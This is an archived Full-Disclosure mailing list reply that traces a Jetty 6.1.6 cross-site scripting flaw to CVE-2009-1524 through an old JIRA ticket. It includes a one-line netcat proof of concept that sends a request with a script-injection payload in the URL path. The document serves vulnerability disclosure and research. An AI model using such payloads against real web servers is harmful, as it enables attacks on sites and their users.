lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 23 Aug 2018 17:13:54 +0100
From: Simon Waters <simon.waters@...evine.com>
To: 1n3@...hmail.com
Cc: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: Re: [FD] Jetty 6.1.6 Cross-Site Scripting (XSS)

On Thu, 23 Aug 2018 at 16:22, <1n3@...hmail.com> wrote:

> It's likely CVE-2009-1524, but the description is vague and no public PoC
> was released as far as I can tell.
>

The demise of the MortBay and Codehaus websites doesn't help, this isn't
the sort of forensics I expected to do.

https://web.archive.org/web/20090709110650/http://jira.codehaus.org/browse/JETTY-980

Suggests semicolon after any directory listing, led to inclusion of the
text after into the document.

 echo -e "GET /cometd/dijit/;<script>alert(document.title);</script>
HTTP/1.0\n\n" | nc 127.0.0.1 8080

The patch file is also archived in the wayback machine.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ